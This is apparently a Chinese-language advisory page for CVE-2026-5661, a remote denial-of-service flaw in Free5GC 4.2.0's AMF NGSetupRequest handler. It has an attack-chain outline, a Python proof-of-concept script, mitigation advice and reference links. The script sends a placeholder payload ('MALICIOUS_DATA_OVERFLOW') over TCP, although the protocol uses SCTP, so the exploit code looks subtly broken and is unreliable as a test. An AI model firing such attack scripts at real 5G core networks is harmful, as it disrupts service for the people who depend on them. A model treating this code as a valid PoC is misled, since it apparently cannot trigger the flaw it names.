CVE-2026-5661 CVSS 5.3 中危

CVE-2026-5661 Free5GC拒绝服务漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5661

漏洞类型

拒绝服务

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Free5GC

漏洞概述

Free5GC 4.2.0版本存在安全漏洞，该漏洞影响了NGSetupRequest Handler组件。攻击者可远程利用此缺陷，通过恶意操作触发拒绝服务（DoS）条件，导致目标系统崩溃或服务不可用。

技术细节

该漏洞源于Free5GC 4.2.0版本中AMF（接入和移动性管理功能）组件的NGSetupRequest处理程序逻辑存在缺陷。Free5GC作为开源5G核心网实现，其NG接口负责与无线接入网（RAN）通信。攻击者无需任何身份认证，可通过网络向AMF发送特制的畸形NGSetupRequest数据包。由于目标组件在处理特定参数或消息结构时缺乏健壮的验证机制，解析异常数据会导致内存访问错误或资源耗尽，进而触发服务崩溃。此漏洞允许攻击者远程发起攻击，导致5G核心网功能中断，严重影响网络可用性。攻击者利用该漏洞可轻易破坏网络基础设施的稳定性，且利用代码已公开，风险较高。

攻击链分析

STEP 1

侦察

攻击者扫描网络寻找暴露的Free5GC AMF接口（通常位于特定SCTP或HTTP端口）。

STEP 2

武器化

攻击者构造特制的畸形NGSetupRequest数据包，利用处理程序的验证缺陷。

STEP 3

投递

攻击者通过网络向目标Free5GC组件远程发送恶意数据包，无需认证。

STEP 4

利用

目标系统解析畸形数据包，触发异常处理逻辑或内存错误。

STEP 5

影响

Free5GC服务进程崩溃或资源耗尽，导致5G核心网拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# Exploit Title: Free5GC 4.2.0 NGSetupRequest Handler DoS PoC
# Description: Sends a malformed packet to trigger the vulnerability
# Usage: python3 poc.py <target_ip> <target_port>

import sys

def send_malicious_packet(target_ip, target_port):
    try:
        # Establish connection to the Free5GC AMF interface
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_ip, int(target_port)))
        
        # Crafted malformed payload targeting NGSetupRequest Handler
        # This is a representative buffer to trigger the parsing flaw
        payload = b"\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x18\x00\x0e\x00\x00MALICIOUS_DATA_OVERFLOW"
        
        s.send(payload)
        print(f"[+] Payload sent to {target_ip}:{target_port}")
        print("[+] Check if the service has crashed.")
        s.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: python3 poc.py <IP> <PORT>")
    else:
        send_malicious_packet(sys.argv[1], sys.argv[2])

影响范围

Free5GC 4.2.0

防御指南

临时缓解措施

在防火墙或网络边界限制对Free5GC AMF管理端口的访问，仅允许受信任的gNodeB IP地址连接；实施网络流量监控以检测异常的NGAP协议请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5661
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5661
3 Details https://www.cvedetails.com/cve/CVE-2026-5661/
4 VulDB https://vuldb.com/cve/CVE-2026-5661
5 Link https://github.com/free5gc/amf/pull/201
6 Link https://github.com/free5gc/free5gc/
7 Link https://github.com/free5gc/free5gc/issues/832
8 Link https://github.com/user-attachments/files/25581199/amfcfg.yaml
9 Link https://vuldb.com/submit/785896
10 Link https://vuldb.com/vuln/355485
11 Link https://vuldb.com/vuln/355485/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表